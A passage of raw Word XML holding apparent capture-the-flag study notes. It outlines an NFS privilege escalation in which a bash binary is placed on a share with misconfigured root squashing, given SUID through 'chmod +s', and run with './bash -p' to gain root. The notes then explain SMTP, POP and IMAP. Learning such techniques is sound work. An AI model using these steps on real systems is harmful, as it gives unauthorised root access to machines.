      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Upload files to NFS share and control permissions of these files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628009CF" w14:textId="4314426B" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Set permissions of upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B44DE5B" w14:textId="2CE68790" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bash shell executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EB7901" w14:textId="4CEABB1F" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Login through SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419731E" w14:textId="4B4433FA" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Execute bash exe to gain root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128ACD2C" w14:textId="3D1A4C27" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The Executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E8561A" w14:textId="51AC08DD" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00FB2FC6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> based bash shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDCF1A8" w14:textId="4996748D" w:rsidR="00FB2FC6" w:rsidRPr="0084205E" w:rsidRDefault="00B754D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NFS Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0225BC" w14:textId="5001CC4B" w:rsidR="00B754D8" w:rsidRPr="0084205E" w:rsidRDefault="00B754D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gain low privilege shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70072A61" w14:textId="2C4EB483" w:rsidR="00B754D8" w:rsidRPr="0084205E" w:rsidRDefault="00B754D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Upload bash executable to NFS share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FDDC7" w14:textId="7751AE41" w:rsidR="00B754D8" w:rsidRPr="0084205E" w:rsidRDefault="00B754D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Set SUID permissions through NFS due to misconfigured Root Squash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396DE50" w14:textId="43987384" w:rsidR="00B754D8" w:rsidRPr="0084205E" w:rsidRDefault="00B754D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Login through SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9479A7" w14:textId="6A4662FA" w:rsidR="00B754D8" w:rsidRPr="0084205E" w:rsidRDefault="00B754D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Execute SUID Bit Bash Exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295007BC" w14:textId="738E710F" w:rsidR="00B754D8" w:rsidRPr="0084205E" w:rsidRDefault="00B754D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ROOT ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22561E" w14:textId="23651EAF" w:rsidR="00AA1E34" w:rsidRPr="0084205E" w:rsidRDefault="00B754D8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Move downloaded bash file to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/mount directory holding NSF share and add SUID via</w:t>
      </w:r>
      <w:r w:rsidR="00AA1E34" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA1E34" w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA1E34" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +s bash and sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA1E34" w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA1E34" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +x bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7956DD16" w14:textId="667F6E19" w:rsidR="00AA1E34" w:rsidRPr="0084205E" w:rsidRDefault="00AA1E34" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Permissions should be: -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rwsr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AFAD7E" w14:textId="03ADAEB3" w:rsidR="00AA1E34" w:rsidRPr="0084205E" w:rsidRDefault="006666FF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Navigate to victim /home/ directory, confirm bash shell is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913C0B3" w14:textId="0CA0AB5E" w:rsidR="006666FF" w:rsidRPr="0084205E" w:rsidRDefault="006666FF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADAF2E5" w14:textId="4B5D918A" w:rsidR="006666FF" w:rsidRPr="0084205E" w:rsidRDefault="006666FF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">If bash-4.4# </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> successful shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA52CF4" w14:textId="393BD504" w:rsidR="006666FF" w:rsidRPr="0084205E" w:rsidRDefault="006666FF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and id to confirm root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4767C3CF" w14:textId="0D1F147E" w:rsidR="006666FF" w:rsidRPr="0084205E" w:rsidRDefault="006666FF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cat /root/root.txt for flag??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C61F0A0" w14:textId="2E841739" w:rsidR="006666FF" w:rsidRPr="0084205E" w:rsidRDefault="006666FF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Understanding SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7BC1F2" w14:textId="293C727F" w:rsidR="006666FF" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Simple Mail Transfer Protocol, paired with protocol pair POP/IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F014D54" w14:textId="6F6545D8" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allow user to send outgoing mail and retrieve incoming mail, respectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B357478" w14:textId="7DF0B29D" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SMTP server performs three basic functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1601222E" w14:textId="2507028E" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Verifies who is sending emails through SMTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F9BF54" w14:textId="5A5C589B" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sends outgoing mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C00F5F" w14:textId="3E39F9CF" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sends mail back to sender if it cannot be delivered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513159A8" w14:textId="352D8BE4" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>POP and IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5C6D1D" w14:textId="63399CF7" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Post Office Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34479A5B" w14:textId="3123BA51" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Relatively simpler approach of downloading the inbox </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>from the mail server,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BAE854" w14:textId="42AF83CD" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Internet Message Access Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62602929" w14:textId="3FF18B4C" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Synchronize current inbox with new mail on the server, downloading anything new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079B7E1" w14:textId="030BB297" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Changes on one computers inbox will persist to another when synched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF0406" w14:textId="6557DBE0" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>How does SMTP work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B1C74" w14:textId="122AB0D4" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User supplies mail, service transfers mail to recipient through a series of steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE78AE" w14:textId="4542F746" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">SMTP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sorts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351523F4" w14:textId="2BF631E7" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">User </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> SMTP server </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> POP/IMAP server </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Recipient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE524EA" w14:textId="7EB2974F" w:rsidR="006E5C10" w:rsidRPr="0084205E" w:rsidRDefault="006E5C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mail user agent (email client or external program) connects to SMTP server of a domain</w:t>
      </w:r>
      <w:r w:rsidR="00376DA6" w:rsidRPr="0084205E">
        <w:t>, initiating SMTP handshake (FIRST STEP OF SMTP PROCESS). Occurs over SMTP port 25. Once validated, session begins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E0994" w14:textId="227884DC" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Client submits sender and receiver email addresses, body of email, attachments, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DC2FE" w14:textId="0CC4447D" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SMTP server checks whether domain name of recipient and sender is the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60841D57" w14:textId="51FF455D" w:rsidR="00376DA6" w:rsidRPr="0084205E" w:rsidRDefault="00376DA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
